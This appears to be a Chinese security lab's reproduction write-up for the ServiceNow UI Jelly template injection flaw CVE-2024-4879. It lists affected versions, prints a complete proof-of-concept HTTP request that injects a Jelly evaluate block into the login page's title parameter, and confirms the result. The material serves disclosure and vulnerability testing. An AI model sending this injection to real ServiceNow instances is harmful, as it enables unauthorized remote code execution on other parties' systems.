ServiceNow是美国ServiceNow公司的一个云计算平台。以帮助公司管理企业运营的数字工作流程。
ServiceNow存在安全漏洞。攻击者利用该漏洞可以在 Now Platform 环境中远程执行代码。
1、 ServiceNow < Utah Patch 10 Hot Fix 3
2、 ServiceNow < Vancouver Patch 6 Hot Fix 2
3、 ServiceNow < Vancouver Patch 7 Hot Fix 3b
4、 ServiceNow < Vancouver Patch 8 Hot Fix 4
5、 ServiceNow < Vancouver Patch 9
6、 ServiceNow < Vancouver Patch 10
7、 ServiceNow < Washington DC Patch 1 Hot Fix 2b
8、 ServiceNow < Washington DC Patch 2 Hot Fix 2
9、 ServiceNow < Washington DC Patch 3 Hot Fix 1
10、 ServiceNow < Washington DC Patch 4
1.访问漏洞环境
POC
漏洞复现
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1024*1024);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
测试1024*1024结果。
结果测试正确。
3.Yakit工具加载nuclei文件测试(漏洞存在)
https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293
https://ti.qianxin.com/vulnerability/detail/359297
原文始发于微信公众号(弥天安全实验室):【成功复现】ServiceNow UI Jelly模板注入漏洞(CVE-2024-4879)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论